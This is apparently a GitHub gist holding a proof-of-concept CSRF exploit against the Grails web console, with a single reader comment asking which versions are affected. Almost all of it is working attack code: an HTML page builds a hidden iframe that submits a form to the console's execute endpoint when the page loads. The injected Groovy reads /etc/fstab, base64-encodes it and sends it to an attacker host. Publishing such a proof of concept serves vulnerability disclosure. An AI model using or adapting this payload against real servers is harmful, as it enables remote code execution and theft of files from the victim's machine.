@berdario berdario/poc.html
Created Aug 8, 2016

Grails console CSRF proof of concept
<html>
<body>
<script>
consoleUrl = 'https://victim.example.com/path/to/console'
attackerHost = 'http://localhost:7979/'
code = `new URL('${attackerHost}'+new File('/etc/fstab').bytes.encodeBase64()).getText()`
code = `evaluate new String('${btoa(code)}'.decodeBase64())` // optional, useful to transmit the payload as a GET argument
function newFrame(content){
let frame = document.createElement('iframe')
frame.srcdoc = content
frame.style = 'visibility:hidden'
document.body.appendChild(frame)
}
rce = `
<html>
<body onload="document.getElementById('do_submit').click()">
<form id="f1" method="GET" action="${consoleUrl}/execute">
<input name="autoImportDomains" value="true">
<input name="code" value="${code}">
<input type="submit" id="do_submit">
</form>
</body>
</html>`
newFrame(rce)
</script>
</body>
</html>
@attritionorg

attritionorg commented Aug 9, 2016

What version of Grails does this affect?
